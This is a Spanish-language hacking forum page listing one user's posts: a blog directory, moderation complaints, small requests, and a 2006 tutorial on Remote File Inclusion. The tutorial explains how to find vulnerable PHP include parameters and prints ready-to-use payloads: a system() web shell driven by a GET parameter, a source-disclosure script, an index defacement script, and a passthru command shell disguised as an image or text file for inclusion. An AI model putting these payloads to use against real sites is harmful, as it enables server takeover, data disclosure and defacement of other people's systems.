elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: [1]
1  Foros Generales / Foro Libre / Indice de blogs, podcasts y webs del foro (entra y añade el tuyo a la lista) en: 19 Mayo 2007, 02:11 am
Indice de blogs, podcasts y webs de los usuarios del foro por orden de añadidura y tema. Si quieres agregar el tuyo manda la url y la sección donde crees que deberia de estar, en caso de no existir favor de comunicarlo.

Salu2

Hydë




Hacking, seguridad y programacion:

WarZone Blog

El Weblog de Skatox

Hackurbano

Sirdarckcat google page

Sirdarckcat Blog 

Sirdarckcat web

Indetectables.net

Ing_Amc web

ANELKAOS

L-bytes

Read Hacked

Skapunky



Geeks, gadgets y Tecnologia

Urban-Hydë

Teft

CoolFrog

El Blog de Gospel

Windows Tips

Buscador y directorio SoloGeeks

N3cr0 web



Entretenimiento en general

Sir Lance Web

Capitan roca

Tarod_esepejota

Elkiot7

El lado del mal

Radio SMX

Forosmf

Cartoons Clasicos

Cascam

Iaghinho

Foro Medieva

Medieva



Descargas

Blog de ThrAnCh
2  Media / Diseño Gráfico / Busco diseñadores para un cartel del FLISoL en: 11 Abril 2007, 00:39 am
Bueno gente de diseño por primera ves publico un post en esta sección porque el diseño no es lo mio jeje, esta vez requiero de su ayuda para hacer un cartel de publicidad que me urge para el FLISoL (Feria Latinoamericana de Instalacion de Software Libre). Interesados favor de enviarme un MP o decirlo aqui

Salu2

Hyde

Pd: he visto el trabajo de muchos de ustedes y es buenisimo pero para evitar hacer spam enviandoles MP mejor deje este post xD
3  Seguridad Informática / Nivel Web / Manual de RFI (Remote File Inclusion) en: 3 Noviembre 2006, 04:53 am
Por principio definamos que RFI significa Remote File Inclusion (Inclusion remota de archivos), esto es producto de una vulnerabilidad en los sitios web a traves de la cual se puede hacer una inclusion de un archivo al server. Para encontrar dichas vulnerabilidades y explotarlas habria que buscarlas con el metodo GET, esto es, ligar los datos a la URL con las variables despues de un signo de interrogacion (?), recordando usar como espacio el singo de mas (+), por ejemplo, cuando usamos el buscador de google nos aparece algo similar a esto:

www.google.com.ar/search?hl=es&ie=UTF-8&q=la+busqueda&meta=

En dicha URL encontramos las siguientes variables: hl, ie, q, meta

No me detendre a explicar el metodo GET y POST en este momento, tratare de hacer un texto mas explicito sobre ellos mas adelante. Para este documento se da por entendido que se tiene un concepto de estos.

Sigamos:

La vulnerabilidad se haria mas o menos asi: index.php?pagina=inicio.php  desde aqui se podrian comenzar con la inclusion de archivos si existe tal bug. Si encontramos alguna que tengamos la idea de que es vulnerable podriamos probarla con nuestro amigo google usando el siguiente camino:

http://www.aquilaweb.com/index.php?variable=http://www.google.com

Si vemos que dentro del sitio se carga la web de google existe la posibilidad de que sea vulnerable dicha web. Para seguir con la vulnerabilidad ahora colocamos lo siguiente:

http.//www.aquilaweb.com/vuln.php?page=http//www.tuweb.com/exploit.gif

Debemos tomar en cuenta que no podemos cambiar la extension a php porque se ejecutaria en nuestro servidor y no en el otro, para hacer esto se debe tener una extension como jpg o gif que deben incluir y el script que se ejecutara en la web victima.

Paseando por la web he encontrado estos scripts:

Citar
<?
/* Este código sirve para ejecutar comandos en el servidor de la web. Esto se hace mediante la siguiente función, que abre la shell y ejecuta el comando que se define por la variable çmd. En este caso es GET para que se pueda definir por la barra de direcciones. También es importante destacar que solo funciona si PHP está configurado con safe_mode OFF*/
$çmd=$_GET[çmd];
system($çmd);
?>


Citar
<?
/* Este archivo muestra el código fuente del archivo que se pasa por el método GET, mediante la variable file. */
$file=$_GET[file];
show_source($file);
?>

Fuente de scripts: texto de Paisterist (no recuerdo la URL exacta)

***


Cambiar el index:

Citar
<?
$fp=fopen("index.php","w+");

fwrite($fp,"<title>Hacked</title>
<body bgcolor="#000000" text="#FF9900">
<center>
<font face="Fixedsys">
<font size="6">Hacked</font><br>
<font size="2">Own yOur B0x!</font>
</center> \n");
fclose($fp);
?>


Otro sencillo ejemplo. Guardar com .gif, .jpg, o .txt y hacer el remote file inclusion con la variable vulnerable y la url de este archivo.

Citar
<?
  // çMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();passthru("$çmd 1> /tmp/çmdtemp 2>&1; cat/tmp/çmdtemp;rm/tmp/çmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>


Fuente: Ejemplos de RFI por el-brujo

***

El texto es totalmente hecho por mi basado en los textos de ambos sujetos. Cualquier publicacion externa debera llevar por lo menos la referencia de quienes han hecho los scripts y mia. Comentarios aqui.

Salu2

Hyde
4  Foros Generales / Sugerencias y dudas sobre el Foro / Tema de colabordador nuevo cerrado... porque?? en: 29 Octubre 2006, 07:39 am
Seria bueno que el-jefe se diera una vuelta por aqui y lo viera, no entiendo porque lo cierran, estamos todos expresando nuestro punto de vista y se me hace muy osado que lo cierren. Yo por lo menos no busco ser colaborador ni nada del foro, con ayudar mientras pueda creo que es suficiente, el titulo de colaborador, coadmin, moderador etc se lo dna a quien lo merece o a quien pueda ayudar a mejorar la situacion de por aqui. Solo pido que se atienda esto, comprendo que no vamos a tener siempre a alguien que cuide el foro de niñatos como los del dia pasado pero no estaria de mas que lo hubiera. Ademas eso de ver sus posts regados por ahi en dudas que intentas resolver no te da nada de gracia. Quiza mas tarde alguno los elimine pero mientras tanto los visitantes y los que intentamos ayudar nos llevamos un mal recuerdo de lo que paso.

Solo espero que lo piensen y me den una razon por la que hayan cerrado el tema.

Salu2

Hyde
5  Foros Generales / Sugerencias y dudas sobre el Foro / Bannear a 3 usuarios en: 27 Octubre 2006, 07:49 am
Pues son 3 usuarios que han causado caos en el foro. Son Impune, soytuputodios y kakakaka... Se han dedicado a fastidiar al foro sin nadie que los pare. Pasaron varios colaboradores y un CoAdmin y no hicieron nada. Agradezco a Kasswed que se tomo la molestia de hacer algo.

Hyde
6  Foros Generales / Sugerencias y dudas sobre el Foro / Buscar un nuevo colaborador para ciertos horarios en: 27 Octubre 2006, 07:24 am
Pues me he dado cuenta al pasar del tiempo en el foro que a partir  de las 12pm en Mex y para adelante no hay nadie del staff por aqui que modere a quienes se dedican a joder en el foro. Deberian buscar a alguien que lo pueda hacer, es una sugerencia. La gente como Impune hace que me salga de mis casillas pero pues nada se puede hacer sin nadie que ayude por aqui. La idea es que tan pronto como empiezen con sus desmanes alguien los detenga porque ayer fue mas de una hora de tenerlos aqui y nadie podia pararlos. Corrompieron todos los posts que pudieron y no dudo que lo vuelvan a hacer, es facil borrarlos, lo se, pero deberian de poner a alguien que lo pueda hacer entre las 12 pm y 3 am de Mex porque nadie pudo controlarlos.

SAlu2

Hyde
7  Foros Generales / Sugerencias y dudas sobre el Foro / Clon de nuestro foro en: 13 Julio 2006, 23:19 pm
Navegando por la web he encontrado una pagina identica a esta con este nombre http://foro.el-hacker.com/index.php no se si tenga relacion con este foro, de no ser asi pues se deberia de hacer algo no creen? salu2
8  Foros Generales / Sugerencias y dudas sobre el Foro / Laboratorio en elhacker en: 4 Julio 2006, 23:24 pm
Buenas a todos, acabo de reincorporarme al foro y he estado leyendo algo de lo ultimo en posts y me he encontrado con que existe un laboratorio en la pagina. Alguien podria darme mas informacion sobre el ?? :huh:

Salu2
9  Media / Juegos y Consolas / Stronghold en: 31 Diciembre 2005, 00:53 am
Busco un parche para el strong hold crusader para poder tenerlo en español

salu2 :)
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines